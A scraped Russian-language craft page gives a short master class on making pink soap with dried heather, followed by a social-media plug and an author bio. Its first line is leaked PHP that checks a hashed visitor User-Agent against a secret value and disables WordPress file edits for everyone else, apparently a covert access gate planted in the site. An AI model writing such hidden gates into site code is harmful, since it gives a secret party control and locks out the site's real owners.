if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс, как селать нежное и красивое мыло с вереском | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс, как селать нежное и красивое мыло с вереском

В домашнем мыловарении популярно мыло с сухоцветами. Вариаций множество: с розой, ромашкой или, например, с вереском.

В домаш­нем мыло­ва­ре­нии попу­ляр­но мыло с сухо­цве­та­ми. Вари­а­ций мно­же­ство: с розой, ромаш­кой или, напри­мер, с вереском.

Для пер­во­го эта­па изго­тов­ле­ния верес­ко­во­го вели­ко­ле­пия нуж­но взять кусок розо­во­го мыла и при помо­щи ово­ще­чист­ки отре­зать от него мно­го тон­ких пла­стин, кото­рые затем нуж­но раз­ре­зать на полоски.

В рас­топ­лен­ную белую осно­ву доба­вить базо­вые мас­ла, пере­ме­шай­те и залей­те в фор­му. Потом туда же высыпь­те полос­ки розо­во­го мыла. Свер­ху сра­зу же насыпь­те слой сухо­го верес­ка. После осты­ва­ния стрях­ни­те лиш­ний сухоцвет.

вереск1

вереск2

вереск3


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!